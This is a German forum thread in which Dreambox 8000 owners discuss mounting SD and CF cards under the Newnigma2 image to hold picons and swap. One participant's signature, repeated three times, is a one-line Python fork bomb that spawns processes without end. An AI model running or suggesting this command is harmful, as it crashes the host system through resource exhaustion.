SD- & CF - Karte mounten...

    • SD- & CF - Karte mounten...

      Hi @ all !!!

      Ich habe soeben das aktuelle Newnigma2 stable auf meine Dreambox 8000 geflasht.

      Es funktioniert auch alles wunderbar...

      Doch wie mounte ich per Fernbedienung meine SD- & CF - Karte, welche beide in meiner Dreambox 8000 drin stecken?

      Ich würde gerne die picons auf meine SD - Karte machen und die Swap - Datei auf meine CF - Karte.



      mfg,
      KLPsAUGER
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

    • Da ich keine 8000er habe versuche ich mal aus der ferne etwas ich geh davon aus ihr habt das 2.4er image drauf für die 8000er.
      Entfernt mal alle usbstick/usbfestplatten dann nehmt den cf steckt ihn in die 8000er wartet 10 sek und guckt mal im usbmanager ob da etwas auftaucht auch wenn das kein usb ist die routine wäre die selbe wenn es über den scsi bus geht.
      Postet bitte ob es funktioniert oder nicht würde mich interessieren.
      mfg
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ok..
      cf ist also nun USB, nicht schön aber ok.
      Und wie bekomme ich nun das swap, die picons usw auf die cf(usb)
      Kann als Speicherort beim swap nur die Hd auswählen und die picons lassen sich entweder in den falsh oder auch auf die Hd packen.

      Sorry für meine blöden Fragen aber hatte bisher das IHAD Image drauf und da war cf auch cf ;)
    • Original von romeo-golf
      Hi,
      ebenfalls sory.... aber nicht in einer DM8000 (die hat nämlich kein IDE mehr, sonder SATA).
      romeo-golf

      Ja. Im Gerätemanager steht das die CF am USB hängt.
      Gemountet auf Media/cf und gut war.

      Iss ja auch egal wie und was.
      Frage ist auf jeden Fall nicht gelöst ?(
    • Original von Don O
      Original von romeo-golf
      Hi,
      ebenfalls sory.... aber nicht in einer DM8000 (die hat nämlich kein IDE mehr, sonder SATA).
      romeo-golf

      Ja. Im Gerätemanager steht das die CF am USB hängt.
      Gemountet auf Media/cf und gut war.

      Iss ja auch egal wie und was.
      Frage ist auf jeden Fall nicht gelöst ?(


      Ich muss mal eins anmerken mir gefällt nicht wie hier diskutiert wird!!
      1.Ich mag das gedönse net im ihad war das anders und und .... lasst das bitte.
      2.Das der CF und der SD slot nunmal am scsibus hängen sowie der USB macht das ganze doch
      recht einfach und vorallem hotplugfähig.
      Behandelt den CF als usbgerät was er ja in dem fall ist nicht wie bei 7025 wo er am ide port hängt.
      Einbinden danach in die fstab eintragen und den link setzen schon könnt ihr swap picons usw auf dem cf installieren fertig.Das ganze geht mit dem usbmanager der in dieser form mit sicherheit nicht im ihad ist.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • bei der 7025 kann man auch keine cf im laufenden betrieb stecken *anmerk*
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Hi,

      Original von kati910
      Ich muss mal eins anmerken mir gefällt nicht wie hier diskutiert wird!!
      1.Ich mag das gedönse net im ihad war das anders und und .... lasst das bitte.


      kläre die User auf und du wirst weniger "gedönse" Post hier finden.

      Das hier:

      the CF is detected as sdb1 - ??? this has to be mounted as USB with the USB manager ???
      Why the change?


      liegt doch an der Unkenntnis des User.

      Und... ich lass mich gern kritisieren, doch wo steht der Sachverhalt? Du als Entwickler bist informiert doch wir die "graue" Masse?


      romeo-golf
    • Also der Umgangston ist hier und im Ihad wohl der gleiche :D

      Ich habe,bevor ich gepostet habe, die cf, wohlgemerkt ohne Vorkenntnisse über das newnigma, mit dem usb Manager eingebunden und in die fstab aber trotzdem bei der Auswahl der Picons zur installation nur HDD!
      das gleiche beim anlegen des swop! Flash oder HDD!
      Wahrscheinlich bin ich halt einfach zu doof für das Image :rolleyes:

      Ich habe nie behauptet bei IHAD wär es besser oder schlechter.
      Wollte einfach mal euer Image probieren da es etwas aktueller ist als das IHAD4.1!
      Der Mensch ist ein Gewohnheitstier, da tut man sich ab und an schwer wenn die Sachen woanders sind.
      Also kein Grund zur Aufregung! ;)

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Don O ()

    • Original von kati910
      Lese halt du musst den link setzen mit dem usbmanager sonst geht das nicht.

      Das habe ich, link ist gesetzt zu /media/sdb1
      Bei Swap gibt es nach wie vor nur die "FESTPLATTE" zur Auswahl!
      Unverändert auch die Auswahl bei den Picons! Festplatte und Flash!
      Das schreib ich von Anfang an!
      So und jetzt, was soll ich noch lesen!!! ?(
      Währe schön wenn mir jemand, der eine DM8000 mit CF und newnigma darauf, bei dem das swap und picons auf der cf haben mir erklären könnte wie es geht, danke

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Don O ()

    • Hi,

      Original von Don O
      Währe schön wenn mir jemand, der eine DM8000 mit CF und newnigma darauf, bei dem das swap und picons auf der cf haben mir erklären könnte wie es geht, danke



      erklären kann ich das auch nicht (Linuxdau) auch wenn hier steht, dass man es nur lesen muss. Ich habe dafür Barry Allen genommen, welcher mir die Einrichtung abnimmt. Man muss den Bootmanager ja nicht aktivieren und nutzen. Doch alleine für die Tools lohnt es sich Barry Allen zu installieren.


      romeo-golf
    • Was versteht ihr nicht?
      Udev ist im image drinn der managed doch alles cf reinschieben dann sollte er schon gemountet sein wenn der mbr des cf in ordnung ist.Danach müsst ihr nur den link setzen dann kann man picons und swap auf cf installieren.Nur sollte man beachten das der cf über USB läuft das heisst der installer für die picons oder der swapmanager gibt euch kein CF als installations medium nur USB FLASH und HDD weil der CF über den scsi bus läuft.Das hab ich schon mehrfach erwähnt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !